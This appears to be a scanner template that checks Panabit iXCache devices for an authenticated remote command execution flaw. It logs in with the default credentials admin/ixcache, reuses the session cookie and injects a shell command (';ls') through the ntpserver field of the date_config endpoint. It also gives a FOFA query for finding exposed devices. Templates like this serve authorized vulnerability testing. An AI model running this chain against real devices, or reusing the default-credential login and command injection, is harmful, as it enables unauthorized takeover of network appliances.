id: panabit-ixcache-dateconfig-rce

info:
    name: Panabit iXCache date_config 后台命令执行
    author: zan8in
    severity: critical
    verified: false
    description: |
      FOFA: title="iXCache"
    reference:
      - https://mp.weixin.qq.com/s/1sZc6YOrca3TiR1IX4fkiw
    tags: panabit,ixcache,rce
    created: 2023/07/31

rules:
  r0:
    request:
      method: POST
      path: /login/userverify.cgi
      body: username=admin&password=ixcache
    expression: response.status == 200 && response.body.bcontains(b"URL=/cgi-bin/monitor.cgi")
    output:
      search: '"Set-Cookie: (?P<cookie>.*?)([\s|;|\n])".bsubmatch(response.raw_header)'
      cookie: search["cookie"]
  r1:
    request:
      method: POST
      path: /cgi-bin/Maintain/date_config
      headers:
        Cookie: "{{cookie}}"
      body: ntpserver=0.0.0.0;ls&year=2021&month=08&day=14&hour=17&minute=04&second=50&tz=Asiz&bcy=Shanghai&ifname=fxp1
    expression: response.status == 200 && response.body.bcontains(b'cfg_cmd') && response.body.bcontains(b'cfg_ssh')
expression: r0() && r1()

